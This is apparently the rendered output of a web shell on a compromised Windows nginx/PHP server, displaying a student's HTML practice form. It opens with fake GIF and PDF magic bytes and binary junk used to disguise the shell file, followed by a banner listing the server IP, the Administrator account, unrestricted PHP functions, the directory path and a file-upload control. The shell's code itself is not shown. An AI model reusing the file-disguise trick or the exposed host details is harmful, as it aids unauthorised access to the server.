GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/examples/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Forms</title> <link href="form.css" rel="stylesheet" type="text/css"> </head> <body> <fieldset><legend>Editable</legend> This fieldset content in editable. </fieldset> <fieldset><legend>Test form</legend> <form action="form.php" method="post" enctype="multipart/form-data"> <br> number <input type="number" name="nbrField"> <input type="hidden" name="hiddenField" value="I am hidden"> text <input type="text" name="txtField"> <br> <textarea cols="80" rows="3"></textarea> <br> <input type="checkbox" name="myCheckA" id="chk_myCheckA" value="chk1"><label for="chk_myCheckA">chk 1</label> <input type="checkbox" name="myCheckB" value="chk2"> chk 2 <input type="checkbox" name="myCheckC" value="chk3"> <input type="checkbox" name="myCheckD" value="chk4"> <input type="checkbox" name="myCheckE" value="chk5"> <br> <input type="radio" name="myRadio" value="rdo1"> <input type="radio" name="myRadio" value="rdo2"> <input type="radio" name="myRadio" value="rdo3"> <input type="radio" name="myRadio" value="rdo4"> <input type="radio" name="myRadio" value="rdo5"> <br> <fieldset><legend>Favorites</legend> <table> <tr> <td><label> <input type="radio" name="RadioGroup1" value="1" id="RadioGroup1_0"> btn1</label></td> </tr> <tr> <td><label> color<input type="radio" name="RadioGroup1" value="blue" id="RadioGroup1_1"> </label></td> </tr> <tr> <td><label> <input type="radio" name="RadioGroup1" value="2" id="RadioGroup1_2">green</label></td> </tr> </table> </fieldset> <br> <select> <option value="1">label 1</option> <option value="2">l 2</option> </select> <br> <input type="file" name="myfile"> jsdfksdjfl <br> <input name="myBtn" type="button" id="myBtn" title="on hover title" value="My button"> <input type="submit" name="task" value="ooga"> <input type="reset"> </form> </fieldset> <main id="mainId" role="main">Content for New main Tag Goes Here</main> </body> </html>